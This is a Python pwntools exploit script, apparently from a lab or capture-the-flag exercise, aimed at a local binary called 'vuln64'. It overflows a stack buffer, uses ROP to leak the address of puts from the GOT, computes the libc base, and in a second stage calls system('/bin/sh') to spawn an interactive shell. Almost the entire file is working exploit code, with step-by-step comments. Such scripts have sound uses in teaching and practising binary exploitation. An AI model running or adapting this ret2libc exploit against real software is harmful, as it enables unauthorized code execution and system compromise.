#!/usr/bin/env python

import sys
from pwn import *

exec_file = "./vuln64"
libc_file = "/lib/x86_64-linux-gnu/libc.so.6"
context.binary = exec_file

e = ELF(exec_file)
libc = ELF(libc_file)

# Determined by static analysis through disassembly.
# Buffer is at rbp-0x40, ret address is at rbp + 0x8.
# Ergo, offset is 0x48.
offset = 0x48

io = process(exec_file)

# Our goal is to call system("/bin/sh").
# We need the address of system() and the "/bin/sh" string
# inside libc.
# So we need an address inside libc.
# Once we have that, we can use offset-based computing to
# determine the address of both system() and the "/bin/sh"
# string.

pop_rdi_ret = 0x0000000000401243

# 1. Provide a payload that leaks the address of a libc function.
# 1'. Call main for the 2nd stage payload (the one calling system("/bin/sh")).

puts_plt = e.symbols['puts']
puts_got = e.symbols['got.puts']
main_address = e.symbols['main']
log.info("puts_got: 0x{:016x}".format(puts_got))
log.info("puts_plt: 0x{:016x}".format(puts_plt))
log.info("main_address: 0x{:016x}".format(main_address))

# Payload calling puts_plt(puts_got) and then calling main again.
payload = offset * "A" + pack(pop_rdi_ret) + pack(puts_got) + pack(puts_plt) + pack(main_address)

# Read "Ho, ho, ho!".
io.readline()
# Send the payload.
io.sendline(payload)
# Read the buffer.
io.readline()
# Read the leaked information using puts_plt(puts_got).
msg = io.readline()

# Print leak.
log.info("msg: {}".format(msg))
msg = msg.rstrip("\n")
log.info("len(msg): {}".format(len(msg)))
leak = unpack(msg + (8-len(msg)) * "\x00")
log.info("leak: 0x{:016x}".format(leak))

puts_address = leak
log.info("puts_address: 0x{:016x}".format(puts_address))

# 2. Compute the address of system() and "/bin/sh".

puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
bin_sh_offset = next(libc.search("/bin/sh\x00"))
libc_start_address = puts_address - puts_offset
system_address = libc_start_address + system_offset
bin_sh_address = libc_start_address + bin_sh_offset

log.info("puts_offset: 0x{:016x}".format(puts_offset))
log.info("system_offset: 0x{:016x}".format(system_offset))
log.info("bin_sh_offset: 0x{:016x}".format(bin_sh_offset))
log.info("libc_start_address: 0x{:016x}".format(libc_start_address))
log.info("system_address: 0x{:016x}".format(system_address))
log.info("bin_sh_address: 0x{:016x}".format(bin_sh_address))

# 3. Provide a new payload that calls system("/bin/sh").

payload = offset * "A" + pack(pop_rdi_ret) + pack(bin_sh_address) + pack(system_address)

# Read "Ho, ho, ho!".
io.readline()
# Send the payload.
io.sendline(payload)
# Read the buffer.
io.readline()

io.interactive()
